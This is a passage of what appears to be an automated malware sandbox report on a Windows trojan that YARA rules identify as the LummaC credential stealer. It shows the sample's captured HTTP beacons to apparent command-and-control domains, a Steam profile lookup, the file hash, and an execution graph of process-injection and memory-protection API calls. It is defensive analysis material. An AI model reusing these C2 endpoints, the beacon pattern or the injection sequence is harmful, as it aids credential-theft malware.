  Transfer-Encoding: chunked
  Connection: close
  Set-Cookie: PHPSESSID=k8pmksmpldeg5d3e6i0v0b489g; expires=Mon, 20 Jan 2025 13:13:03 GMT; Max-Age=9999999; path=/
  Expires: Thu, 19 Nov 1981 08:52:00 GMT
  Cache-Control: no-store, no-cache, must-revalidate
  Pragma: no-cache
  CF-Cache-Status: DYNAMIC
  Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=OFQF3UL%2BsKtaodywRi0vdtDru9%2F%2BXiBPQ0Gund5dtdzxROBvL%2F1QbXGtfQbrVC%2BzkSjhpSj0rYODVPxxqpMbTjxEKz7M6WYN%2Fnc5uhAh0u9fR4iitiaRSOvTzC36pZo5B%2FCtlkw%3D"}],"group":"cf-nel","max_age":604800}
  NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
  Server: cloudflare
  CF-RAY: 8c95a53a6c5b42b5-EWR
2024-09-26 19:26:24 UTC  15     IN         Data Raw: 61 0d 0a 65 72 72 6f 72 20 23 44 31 32 0d 0a
  Data Ascii: aerror #D12
2024-09-26 19:26:24 UTC  5      IN         Data Raw: 30 0d 0a 0d 0a
  Data Ascii: 0

Session ID: 8
Source IP: 192.168.2.4
Source Port: 49744
Destination IP: 172.67.208.139
Destination Port: 443
PID: 7016
Process: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.Win32.Crypt.24800.18482.exe

Timestamp                Bytes  Direction  Data
2024-09-26 19:26:25 UTC  263    OUT        POST /api HTTP/1.1
  Connection: Keep-Alive
  Content-Type: application/x-www-form-urlencoded
  User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
  Content-Length: 8
  Host: reinforcenh.shop
2024-09-26 19:26:25 UTC  8      OUT        Data Raw: 61 63 74 3d 6c 69 66 65
  Data Ascii: act=life
2024-09-26 19:26:25 UTC  766    IN         HTTP/1.1 200 OK
  Date: Thu, 26 Sep 2024 19:26:25 GMT
  Content-Type: text/html; charset=UTF-8
  Transfer-Encoding: chunked
  Connection: close
  Set-Cookie: PHPSESSID=mpsemti9muical24kqfn44mpr7; expires=Mon, 20 Jan 2025 13:13:04 GMT; Max-Age=9999999; path=/
  Expires: Thu, 19 Nov 1981 08:52:00 GMT
  Cache-Control: no-store, no-cache, must-revalidate
  Pragma: no-cache
  CF-Cache-Status: DYNAMIC
  Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=pbwPheRcDvDi0f8k74nP2kPX9ne9rZ4L6X2iUmmotTZsNTY7C2dz1h%2BOmZxUPHimrrlG2awl%2BgwG8Qo1Q7hMcNs0PZca%2BBZVt0R7ryzcBtNzYnjRoChIky8l81oG1rlgDngD"}],"group":"cf-nel","max_age":604800}
  NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
  Server: cloudflare
  CF-RAY: 8c95a5402cf341a9-EWR
2024-09-26 19:26:25 UTC  15     IN         Data Raw: 61 0d 0a 65 72 72 6f 72 20 23 44 31 32 0d 0a
  Data Ascii: aerror #D12
2024-09-26 19:26:25 UTC  5      IN         Data Raw: 30 0d 0a 0d 0a
  Data Ascii: 0

Session ID: 9
Source IP: 192.168.2.4
Source Port: 49745
Destination IP: 104.102.49.254
Destination Port: 443
PID: 7016
Process: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.Win32.Crypt.24800.18482.exe

Timestamp                Bytes  Direction  Data
2024-09-26 19:26:26 UTC  219    OUT        GET /profiles/76561199724331900 HTTP/1.1
  Connection: Keep-Alive
  User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
  Host: steamcommunity.com
2024-09-26 19:26:26 UTC  1870   IN         HTTP/1.1 200 OK
  Server: nginx
  Content-Type: text/html; charset=UTF-8
  Content-Security-Policy: default-src blob: data: https: 'unsafe-inline' 'unsafe-eval'; script-src 'self' 'unsafe-inline' 'unsafe-eval' https://community.akamai.steamstatic.com/ https://cdn.akamai.steamstatic.com/steamcommunity/public/assets/ https://api.steampowered.com/ https://recaptcha.net https://www.google.com/recaptcha/ https://www.gstatic.cn/recaptcha/ https://www.gstatic.com/recaptcha/ https://www.youtube.com/ https://s.ytimg.com; object-src 'none'; connect-src 'self' https://community.akamai.steamstatic.com/ https://store.steampowered.com/ https://checkout.steampowered.com/ wss://community.steam-api.com/websocket/ https://api.steampowered.com/ https://login.steampowered.com/ https://help.steampowered.com/ https://steam.tv/ https://steamcommunity.com/ https://*.valvesoftware.com https://*.steambeta.net https://*.discovery.beta.steamserver.net https://*.steamcontent.com https://steambroadcast.akamaized.net https://steambroadcast-test.akamaized.net https://broadcast.st.dl.eccdnx.com https://lv.queniujq. [TRUNCATED]
  Expires: Mon, 26 Jul 1997 05:00:00 GMT
  Cache-Control: no-cache
  Date: Thu, 26 Sep 2024 19:26:26 GMT
  Content-Length: 34663
  Connection: close
  Set-Cookie: sessionid=051c7165566eab8c46100c5f; Path=/; Secure; SameSite=None
  Set-Cookie: steamCountry=US%7Cd7fb65801182a5f50a3169fe2a0b7ef0; Path=/; Secure; HttpOnly; SameSite=None
2024-09-26 19:26:26 UTC  14514  IN         Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0d 0a 3c 68 74 6d 6c 20 63 6c 61 73 73 3d 22 20 72 65 73 70 6f 6e 73 69 76 65 22 20 6c 61 6e 67 3d 22 65 6e 22 3e 0d 0a 3c 68 65 61 64 3e 0d 0a 09 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 55 54 46 2d 38 22 3e 0d 0a 09 09 09 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 22 3e 0d 0a 09 09 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 74 68 65 6d 65 2d 63 6f 6c 6f 72 22 20 63 6f 6e 74 65 6e 74 3d 22 23 31 37 31 61 32 31 22 3e 0d 0a 09 09 3c
  Data Ascii: <!DOCTYPE html><html class=" responsive" lang="en"><head><meta http-equiv="Content-Type" content="text/html; charset=UTF-8"><meta name="viewport" content="width=device-width,initial-scale=1"><meta name="theme-color" content="#171a21"><
2024-09-26 19:26:27 UTC  16384  IN         Data Raw: 65 72 6e 61 76 5f 63 6f 6e 74 65 6e 74 27 2c 20 27 6f 66 66 73 65 74 59 27 3a 2d 36 2c 20 27 6f 66 66 73 65 74 58 27 3a 20 31 2c 20 27 68 6f 72 69 7a 6f 6e 74 61 6c 53 6e 61 70 27 3a 20 34 2c 20 27 74 6f 6f 6c 74 69 70 50 61 72 65 6e 74 27 3a 20 27 23 67 6c 6f 62 61 6c 5f 68 65 61 64 65 72 20 2e 73 75 70 65 72 6e 61 76 5f 63 6f 6e 74 61 69 6e 65 72 27 2c 20 27 63 6f 72 72 65 63 74 46 6f 72 53 63 72 65 65 6e 53 69 7a 65 27 3a 20 66 61 6c 73 65 7d 29 3b 0d 0a 09 09 7d 29 3b 0d 0a 09 3c 2f 73 63 72 69 70 74 3e 0d 0a 0d 0a 09 09 3c 64 69 76 20 69 64 3d 22 67 6c 6f 62 61 6c 5f 61 63 74 69 6f 6e 73 22 3e 0d 0a 09 09 09 3c 64 69 76 20 72 6f 6c 65 3d 22 6e 61 76 69 67 61 74 69 6f 6e 22 20 69 64 3d 22 67 6c 6f 62 61 6c 5f 61 63 74 69 6f 6e 5f 6d 65 6e 75 22 20 61
  Data Ascii: ernav_content', 'offsetY':-6, 'offsetX': 1, 'horizontalSnap': 4, 'tooltipParent': '#global_header .supernav_container', 'correctForScreenSize': false});});</script><div id="global_actions"><div role="navigation" id="global_action_menu" a
2024-09-26 19:26:27 UTC  3765   IN         Data Raw: 65 20 69 6e 66 6f 3c 2f 73 70 61 6e 3e 0d 0a 09 09 09 09 09 09 3c 2f 64 69 76 3e 0d 0a 09 09 09 09 09 09 3c 73 63 72 69 70 74 20 74 79 70 65 3d 22 74 65 78 74 2f 6a 61 76 61 73 63 72 69 70 74 22 3e 20 24 4a 28 20 66 75 6e 63 74 69 6f 6e 28 29 20 7b 20 49 6e 69 74 50 72 6f 66 69 6c 65 53 75 6d 6d 61 72 79 28 20 67 5f 72 67 50 72 6f 66 69 6c 65 44 61 74 61 5b 27 73 75 6d 6d 61 72 79 27 5d 20 29 3b 20 7d 20 29 3b 20 3c 2f 73 63 72 69 70 74 3e 0d 0a 09 09 09 09 09 09 09 09 09 3c 2f 64 69 76 3e 0d 0a 0d 0a 09 09 09 3c 2f 64 69 76 3e 0d 0a 09 09 3c 2f 64 69 76 3e 0d 0a 09 3c 2f 64 69 76 3e 0d 0a 3c 2f 64 69 76 3e 0d 0a 09 3c 64 69 76 20 63 6c 61 73 73 3d 22 70 72 6f 66 69 6c 65 5f 63 6f 6e 74 65 6e 74 20 22 3e 0d 0a 09 09 3c 64 69 76 20 63 6c 61 73 73 3d 22 70
                                                                        Data Ascii: e info</span></div><script type="text/javascript"> $J( function() { InitProfileSummary( g_rgProfileData['summary'] ); } ); </script></div></div></div></div></div><div class="profile_content "><div class="p


                                                                        Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                        10 | 192.168.2.4 | 49746 | 172.67.128.144 | 443 | 7016 | C:\Users\user\Desktop\SecuriteInfo.com.Trojan.Win32.Crypt.24800.18482.exe
                                                                        Timestamp | Bytes transferred | Direction | Data
                                                                        2024-09-26 19:26:27 UTC | 261 | OUT | POST /api HTTP/1.1
                                                                        Connection: Keep-Alive
                                                                        Content-Type: application/x-www-form-urlencoded
                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
                                                                        Content-Length: 8
                                                                        Host: ballotnwu.site
                                                                        2024-09-26 19:26:27 UTC | 8 | OUT | Data Raw: 61 63 74 3d 6c 69 66 65
                                                                        Data Ascii: act=life
                                                                        2024-09-26 19:26:28 UTC | 770 | IN | HTTP/1.1 200 OK
                                                                        Date: Thu, 26 Sep 2024 19:26:27 GMT
                                                                        Content-Type: text/html; charset=UTF-8
                                                                        Transfer-Encoding: chunked
                                                                        Connection: close
                                                                        Set-Cookie: PHPSESSID=bp92llogdsbmg4q7ek5vphsdou; expires=Mon, 20 Jan 2025 13:13:06 GMT; Max-Age=9999999; path=/
                                                                        Expires: Thu, 19 Nov 1981 08:52:00 GMT
                                                                        Cache-Control: no-store, no-cache, must-revalidate
                                                                        Pragma: no-cache
                                                                        CF-Cache-Status: DYNAMIC
                                                                        Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=erdNRCsFf4phcTzlkosY8e8oS%2B8dUZ%2BGWKRLxEZS560Ucn3damaVyZizNg4oq%2FfMoIqvBy2PqajRH60Qiayyd0F7f5AFNVz2bP4vhA6tK5PKU5gbzak2JmlgYXPitCB6Hw%3D%3D"}],"group":"cf-nel","max_age":604800}
                                                                        NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                        Server: cloudflare
                                                                        CF-RAY: 8c95a54ec98980cd-EWR
                                                                        2024-09-26 19:26:28 UTC | 15 | IN | Data Raw: 61 0d 0a 65 72 72 6f 72 20 23 44 31 32 0d 0a
                                                                        Data Ascii: aerror #D12
                                                                        2024-09-26 19:26:28 UTC | 5 | IN | Data Raw: 30 0d 0a 0d 0a
                                                                        Data Ascii: 0


                                                                        Target ID:0
                                                                        Start time:15:25:57
                                                                        Start date:26/09/2024
                                                                        Path:C:\Users\user\Desktop\SecuriteInfo.com.Trojan.Win32.Crypt.24800.18482.exe
                                                                        Wow64 process (32bit):true
                                                                        Commandline:"C:\Users\user\Desktop\SecuriteInfo.com.Trojan.Win32.Crypt.24800.18482.exe"
                                                                        Imagebase:0x400000
                                                                        File size:4'547'072 bytes
                                                                        MD5 hash:AAF6F0C0F007E9462C8BF58ACD555CAF
                                                                        Has elevated privileges:true
                                                                        Has administrator privileges:true
                                                                        Programmed in:C, C++ or other language
                                                                        Yara matches:
                                                                        • Rule: JoeSecurity_LummaCStealer_4, Description: Yara detected LummaC Stealer, Source: 00000000.00000002.1887027277.0000000002500000.00000040.00001000.00020000.00000000.sdmp, Author: Joe Security
                                                                        • Rule: JoeSecurity_LummaCStealer_4, Description: Yara detected LummaC Stealer, Source: 00000000.00000002.1886487919.00000000007D0000.00000040.00000001.01000000.00000003.sdmp, Author: Joe Security
                                                                        Reputation:low
                                                                        Has exited:true

                                                                        Target ID:2
                                                                        Start time:15:26:14
                                                                        Start date:26/09/2024
                                                                        Path:C:\Users\user\Desktop\SecuriteInfo.com.Trojan.Win32.Crypt.24800.18482.exe
                                                                        Wow64 process (32bit):true
                                                                        Commandline:"C:\Users\user\Desktop\SecuriteInfo.com.Trojan.Win32.Crypt.24800.18482.exe"
                                                                        Imagebase:0x400000
                                                                        File size:4'547'072 bytes
                                                                        MD5 hash:AAF6F0C0F007E9462C8BF58ACD555CAF
                                                                        Has elevated privileges:true
                                                                        Has administrator privileges:true
                                                                        Programmed in:C, C++ or other language
                                                                        Reputation:low
                                                                        Has exited:true


                                                                          Execution Graph

                                                                          Execution Coverage:1.6%
                                                                          Dynamic/Decrypted Code Coverage:65.9%
                                                                          Signature Coverage:75.6%
                                                                          Total number of Nodes:135
                                                                          Total number of Limit Nodes:11
                                                                          execution_graph 28442 4bc4a8 28443 4bc4be ExitProcess 28442->28443 28448 4a4b8c 28451 4a4b9e 28448->28451 28452 4a4b53 VirtualProtect 28451->28452 28454 4a4c36 28452->28454 28455 4a4a2c 28456 4a4a56 VirtualProtect 28455->28456 28458 4a4aff 28456->28458 28459 4a4b45 VirtualProtect 28456->28459 28464 4a4b21 VirtualProtect 28458->28464 28463 4a4c36 28459->28463 28465 8342c8 28466 8342ef 28465->28466 28467 834329 VirtualAlloc 28466->28467 28468 8343a0 28467->28468 28469 8356fc VirtualFree 28468->28469 28470 835720 28469->28470 28471 4b4040 28472 4b4b90 NtQueryDefaultLocale 28471->28472 28473 4b4ba7 28472->28473 28474 4bab04 VirtualProtect 28483 4bab15 28474->28483 28476 4bbdf3 28487 4bbe19 ExitProcess 28476->28487 28477 4bb4e7 28486 4bb59d 8 API calls 28477->28486 28482 4bb1dd 28482->28476 28482->28477 28483->28482 28484 4bae7c 28483->28484 28485 4bb20c 8 API calls 28483->28485 28488 82ec31 VirtualProtect 28489 82ec62 28488->28489 28490 867f31 28491 868643 VirtualProtect 28490->28491 28492 868664 28491->28492 28493 4b3553 28494 4b3584 NtQueryDefaultLocale 28493->28494 28496 4b35e5 28494->28496 28500 4b37a7 28494->28500 28522 4b360f 9 API calls 28496->28522 28499 4b3879 28514 4b3b60 28499->28514 28500->28499 28501 4b38e4 28500->28501 28523 4b391e 7 API calls 28501->28523 28503 4b3b56 28505 4b3b83 28503->28505 28511 4b4490 28503->28511 28506 4b3c30 NtQueryDefaultLocale NtQueryDefaultLocale NtQueryDefaultLocale NtQueryDefaultLocale 28505->28506 28508 4b3c28 28506->28508 28512 4b4b90 NtQueryDefaultLocale 28511->28512 28513 4b4ba7 28512->28513 28515 4b3b6f 28514->28515 28516 4b3b83 28515->28516 28519 4b4490 28515->28519 28524 4b3c30 NtQueryDefaultLocale NtQueryDefaultLocale NtQueryDefaultLocale NtQueryDefaultLocale 28516->28524 28520 4b4b90 NtQueryDefaultLocale 28519->28520 28521 4b4ba7 28520->28521 28525 8791bb 28528 87920c 28525->28528 28531 87922a 28528->28531 28529 87989f WriteProcessMemory 28530 
8798db 28529->28530 28536 8798d6 28529->28536 28555 8799e4 28530->28555 28531->28529 28533 879eb3 28534 879ed3 9 API calls 28533->28534 28540 879ecb 28534->28540 28535 8799dc 28535->28533 28537 87a24b 28535->28537 28542 879ea4 28535->28542 28539 87a9f1 DebugActiveProcessStop NtCreateThreadEx NtCreateThreadEx NtCreateThreadEx NtCreateThreadEx 28537->28539 28544 87a19e 28537->28544 28538 87c13a DebugActiveProcessStop 28545 87c169 28538->28545 28539->28544 28541 87a467 7 API calls 28540->28541 28540->28542 28543 87a45d 28541->28543 28542->28537 28542->28540 28542->28544 28543->28537 28544->28536 28544->28538 28546 87c4cf NtCreateThreadEx NtCreateThreadEx NtCreateThreadEx 28545->28546 28549 87c4c5 28546->28549 28547 87c98d NtCreateThreadEx 28547->28536 28549->28547 28550 87ca2e 28549->28550 28553 87cb79 28549->28553 28550->28547 28551 87d3ac NtCreateThreadEx 28550->28551 28551->28547 28552 87cbd0 NtCreateThreadEx NtCreateThreadEx 28552->28553 28553->28549 28553->28552 28554 87cc33 28553->28554 28554->28550 28558 879a11 28555->28558 28556 879eb3 28588 879ed3 9 API calls 28556->28588 28558->28556 28559 87a24b 28558->28559 28564 879ea4 28558->28564 28567 87a19e 28559->28567 28590 87a9f1 28559->28590 28560 87c13a DebugActiveProcessStop 28566 87c169 28560->28566 28562 879ecb 28562->28564 28589 87a467 7 API calls 28562->28589 28564->28559 28564->28562 28564->28567 28578 87c4cf 28566->28578 28567->28560 28577 87ad34 28567->28577 28580 87c4fe 28578->28580 28582 87ca2e 28578->28582 28580->28582 28583 87c98d NtCreateThreadEx 28580->28583 28584 87cb79 28580->28584 28581 87d54e 28582->28583 28605 87d3ac 28582->28605 28583->28581 28584->28580 28587 87cc33 28584->28587 28604 87cb79 NtCreateThreadEx NtCreateThreadEx 28584->28604 28587->28582 28592 87aa1a 28590->28592 28591 87c13a DebugActiveProcessStop 28593 87c169 28591->28593 28592->28591 28595 87ad34 28592->28595 28594 87c4cf 3 API calls 28593->28594 28596 87c4c5 28594->28596 28597 87ca2e 28596->28597 28599 87c98d NtCreateThreadEx 
28596->28599 28602 87cb79 28596->28602 28597->28599 28600 87d3ac NtCreateThreadEx 28597->28600 28599->28595 28600->28599 28602->28596 28603 87cc33 28602->28603 28609 87cb79 NtCreateThreadEx NtCreateThreadEx 28602->28609 28603->28597 28606 87d348 28605->28606 28607 87d50b NtCreateThreadEx 28606->28607 28608 87d54e 28607->28608 28614 83c3be 28617 83c3d4 28614->28617 28618 83c3f9 VirtualProtect 28617->28618 28620 83c4a2 28618->28620 28621 83c561 VirtualProtect 28620->28621 28625 83c52f 28620->28625 28623 83c593 28621->28623 28627 83c4f6 28625->28627 28626 83c561 VirtualProtect 28628 83c593 28626->28628 28627->28626 28629 82ff1d 28630 8305e2 LoadLibraryW 28629->28630 28631 82fea5 28629->28631 28632 8305ff LoadLibraryW 28630->28632 28633 83061c 28630->28633 28631->28630 28632->28633
                                                                          APIs
                                                                          • WriteProcessMemory.KERNELBASE(?,?,?,00000004,?), ref: 008798CC
                                                                          Strings
                                                                          Memory Dump Source
                                                                          • Source File: 00000000.00000002.1886701827.0000000000852000.00000040.00000001.01000000.00000003.sdmp, Offset: 00852000, based on PE: false
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_0_2_852000_SecuriteInfo.jbxd
                                                                          Similarity
                                                                          • API ID: MemoryProcessWrite
                                                                          • String ID: A$D$L$L$L$L$P$S$W$W$_R$a$a$a$a$b$b$b$c$c$d$d$e$e$e$g$i$i$i$o$o$o$o$p$r$r$r$r$r$s$s$t$t$u$v$y$y
                                                                          • API String ID: 3559483778-1307394542
                                                                          • Opcode ID: 3ea60ddc4aceaf9c214006cf0488501bb34de7a7dbec126d93c1b770d68830df
                                                                          • Instruction ID: 800750eae04ccb2c17ce4e583eb200145dba391c62227ba782aa01ae421b1b55
                                                                          • Opcode Fuzzy Hash: 3ea60ddc4aceaf9c214006cf0488501bb34de7a7dbec126d93c1b770d68830df
                                                                          • Instruction Fuzzy Hash: 5372E1B1D082A88AEB24CB24CC847EABBB5FF55304F0481E9D44DA7685D2799FC5CF52

                                                                          Control-flow Graph

                                                                          Strings
                                                                          Memory Dump Source
                                                                          • Source File: 00000000.00000002.1886632592.000000000082E000.00000040.00000001.01000000.00000003.sdmp, Offset: 0082E000, based on PE: false
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_0_2_82e000_SecuriteInfo.jbxd
                                                                          Similarity
                                                                          • API ID:
                                                                          • String ID: :?@>$A79>$J3LP$L$L$L$L$L$L$L3G:$P$P$W$W$W$ZR$a$a$a$a$a$a$b$b$b$d$d$d$i$i$i$o$o$o$r$r$r$r$r$r$y$y$y
                                                                          • API String ID: 0-2166508227
                                                                          • Opcode ID: 777f3830e681067d68e7c78ef7cf82ae6ad36378ee805a4e5de8220d4aee1a67
                                                                          • Instruction ID: 8c3c49218cdd2424539dd849073bfa2613258b2de781deb673f73a5e534b09b8
                                                                          • Opcode Fuzzy Hash: 777f3830e681067d68e7c78ef7cf82ae6ad36378ee805a4e5de8220d4aee1a67
                                                                          • Instruction Fuzzy Hash: 86A21691D086A88AFB218724DC447AA7B75FF91304F0480F9D48CAB282D67E5FD5CF66

                                                                          Control-flow Graph

                                                                          Strings
                                                                          Memory Dump Source
                                                                          • Source File: 00000000.00000002.1886632592.000000000082E000.00000040.00000001.01000000.00000003.sdmp, Offset: 0082E000, based on PE: false
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_0_2_82e000_SecuriteInfo.jbxd
                                                                          Similarity
                                                                          • API ID:
                                                                          • String ID: :?@>$A79>$J3LP$L$L$L$L$L$L$L3G:$P$P$W$W$W$ZR$a$a$a$a$a$a$b$b$b$d$d$d$i$i$i$o$o$o$r$r$r$r$r$r$y$y$y
                                                                          • API String ID: 0-2166508227
                                                                          • Opcode ID: 0bc74c15971a6514468afca5d746488cf26023405e8c5503983517a713978ad0
                                                                          • Instruction ID: c87e488e20f1befaf9eac49f71384bcc82dc33bb2792faf1c0bd6a02d2553f1b
                                                                          • Opcode Fuzzy Hash: 0bc74c15971a6514468afca5d746488cf26023405e8c5503983517a713978ad0
                                                                          • Instruction Fuzzy Hash: 99921551D086A88AFB218724DC447AABB75FF91304F0480F9D48CAB282D67E5FD5CF66

                                                                          Control-flow Graph

                                                                          Strings
                                                                          Memory Dump Source
                                                                          • Source File: 00000000.00000002.1886632592.000000000082E000.00000040.00000001.01000000.00000003.sdmp, Offset: 0082E000, based on PE: false
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_0_2_82e000_SecuriteInfo.jbxd
                                                                          Similarity
                                                                          • API ID:
                                                                          • String ID: :?@>$A79>$J3LP$L$L$L$L$L$L$L3G:$P$P$W$W$W$ZR$a$a$a$a$a$a$b$b$b$d$d$d$i$i$i$o$o$o$r$r$r$r$r$r$y$y$y
                                                                          • API String ID: 0-2166508227
                                                                          • Opcode ID: c3c4b97afc01b5f44dcaeb9454b987c1b8d0f1e6130360dcf60612f2bc77521a
                                                                          • Instruction ID: 15b2a5f85f5eb8caf764c5d6c9c817180853612d1359fb067a37a5432d40772f
                                                                          • Opcode Fuzzy Hash: c3c4b97afc01b5f44dcaeb9454b987c1b8d0f1e6130360dcf60612f2bc77521a
                                                                          • Instruction Fuzzy Hash: A5920451D086A88AFB218724DC547AABB75FF91304F0480F9D48CAB282D67E5FD5CF62

                                                                          Control-flow Graph

                                                                          control_flow_graph 715 82f4c8-82f4d8 716 82f4de-82f4eb 715->716 717 82f3dd-82f467 715->717 719 82f4f9 716->719 720 82f4ed-82f4f7 716->720 721 82f472-82f4b3 717->721 722 82f46d call 82f47c 717->722 723 82f503-82f509 719->723 720->723 725 82f50f-8305fd call 82f5e8 call 82f75d LoadLibraryW 721->725 722->721 723->725 743 83065a-8319ae call 830688 call 830700 call 8309fe call 830acc call 830ebd 725->743 744 8305ff-83061a LoadLibraryW 725->744 755 8319b6-833060 call 831a1b call 831a32 call 831aa8 call 831c3c call 831c86 call 83210a call 83211f call 83305e 743->755 744->743 745 83061c-830637 744->745 745->743 751 830639-830654 745->751 751->743 751->755 807 833062 755->807 807->807
                                                                          Strings
                                                                          Memory Dump Source
                                                                          • Source File: 00000000.00000002.1886632592.000000000082E000.00000040.00000001.01000000.00000003.sdmp, Offset: 0082E000, based on PE: false
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_0_2_82e000_SecuriteInfo.jbxd
                                                                          Similarity
                                                                          • API ID:
                                                                          • String ID: :?@>$J3LP$L$L$L$L$L$L$L3G:$P$P$W$W$W$ZR$a$a$a$a$a$a$b$b$b$d$d$d$i$i$i$o$o$o$r$r$r$r$r$r$y$y$y
                                                                          • API String ID: 0-4213390939
                                                                          • Opcode ID: 084ab36494b0247b970bdaa78185fe49918d179e61d5af7e688872fa0db9c617
                                                                          • Instruction ID: aa0efff2639510892d2bdceaae045c5a67c019e3fcb19369b52271f88505acb0
                                                                          • Opcode Fuzzy Hash: 084ab36494b0247b970bdaa78185fe49918d179e61d5af7e688872fa0db9c617
                                                                          • Instruction Fuzzy Hash: DE72E4A1D046A88EFB218B24DC547AA7B79EF91304F0480F9D48CA7281D67E5FD5CF62

                                                                          Control-flow Graph

                                                                          Strings
                                                                          Memory Dump Source
                                                                          • Source File: 00000000.00000002.1886632592.000000000082E000.00000040.00000001.01000000.00000003.sdmp, Offset: 0082E000, based on PE: false
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_0_2_82e000_SecuriteInfo.jbxd
                                                                          Similarity
                                                                          • API ID:
                                                                          • String ID: :?@>$J3LP$L$L$L$L$L$L$L3G:$P$P$W$W$W$ZR$a$a$a$a$a$a$b$b$b$d$d$d$i$i$i$o$o$o$r$r$r$r$r$r$y$y$y
                                                                          • API String ID: 0-4213390939
                                                                          • Opcode ID: 30a7e5b34ec73870998d2a8438680104056d2f87f0fd16e424783eaa05757f17
                                                                          • Instruction ID: cb38cb41ccfa9148f1df71559460aafd618c8090e3b1c159f4ab198ad5cb03b1
                                                                          • Opcode Fuzzy Hash: 30a7e5b34ec73870998d2a8438680104056d2f87f0fd16e424783eaa05757f17
                                                                          • Instruction Fuzzy Hash: 7B72E4A1D046A88EFB218724DC547AA7B79EF91304F0480F9D48CA7282D67E5FD5CF62

                                                                          Control-flow Graph

                                                                          Strings
                                                                          Memory Dump Source
                                                                          • Source File: 00000000.00000002.1886632592.000000000082E000.00000040.00000001.01000000.00000003.sdmp, Offset: 0082E000, based on PE: false
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_0_2_82e000_SecuriteInfo.jbxd
                                                                          Similarity
                                                                          • API ID:
                                                                          • String ID: :?@>$J3LP$L$L$L$L$L$L$L3G:$P$P$W$W$W$ZR$a$a$a$a$a$a$b$b$b$d$d$d$i$i$i$o$o$o$r$r$r$r$r$r$y$y$y
                                                                          • API String ID: 0-4213390939
                                                                          • Opcode ID: 4a925cbadef9c540b0136d5568bc7a529c7737005d0787ada711e4b0c261c8ee
                                                                          • Instruction ID: 21ae68077b04628e3768d9676ca05f7cacc93364794154bcf43bd6db8d8c45f6
                                                                          • Opcode Fuzzy Hash: 4a925cbadef9c540b0136d5568bc7a529c7737005d0787ada711e4b0c261c8ee
                                                                          • Instruction Fuzzy Hash: F262D4A1D046A88EFB218724DC547AA7B79EF91304F0480F9D48CA7282D67E5FD5CF62

                                                                          Control-flow Graph

                                                                          Strings
                                                                          Memory Dump Source
                                                                          • Source File: 00000000.00000002.1886632592.000000000082E000.00000040.00000001.01000000.00000003.sdmp, Offset: 0082E000, based on PE: false
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_0_2_82e000_SecuriteInfo.jbxd
                                                                          Similarity
                                                                          • API ID:
                                                                          • String ID: :?@>$J3LP$L$L$L$L$L$L$L3G:$P$P$W$W$W$ZR$a$a$a$a$a$a$b$b$b$d$d$d$i$i$i$o$o$o$r$r$r$r$r$r$y$y$y
                                                                          • API String ID: 0-4213390939
                                                                          • Opcode ID: 50155792656fd08c0c04579a9832743213fc242382d4ff6cdf5d66f663d059e4
                                                                          • Instruction ID: b6c6dd8adabd99537e09e99cd6882e191ba4e03df5fcfd8038e65c9d226fcebc
                                                                          • Opcode Fuzzy Hash: 50155792656fd08c0c04579a9832743213fc242382d4ff6cdf5d66f663d059e4
                                                                          • Instruction Fuzzy Hash: B462F5A1D086A88EF7218724DC547AA7B79EF91304F0480F9D48CA7282D67E5FD5CF62

                                                                          Control-flow Graph

                                                                          APIs
                                                                          • LoadLibraryW.KERNELBASE(FFFFF4F9), ref: 008305F5
                                                                          • LoadLibraryW.KERNELBASE(?), ref: 00830612
                                                                          Strings
                                                                          Memory Dump Source
                                                                          • Source File: 00000000.00000002.1886632592.000000000082E000.00000040.00000001.01000000.00000003.sdmp, Offset: 0082E000, based on PE: false
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_0_2_82e000_SecuriteInfo.jbxd
                                                                          Similarity
                                                                          • API ID: LibraryLoad
                                                                          • String ID: :?@>$J3LP$L$L$L$L$L$L$L3G:$P$P$W$W$W$ZR$a$a$a$a$a$a$b$b$b$d$d$d$i$i$i$o$o$o$r$r$r$r$r$r$y$y$y
                                                                          • API String ID: 1029625771-4213390939
                                                                          • Opcode ID: 6bcf25f7376dcfef4b1cee5d05798b4a67e2137c0f87b421cf068cf447802002
                                                                          • Instruction ID: 4027657ed0c1b0da2c083dcf75c318ad7aae436f76a5d93650f8ba7c3f2fe42c
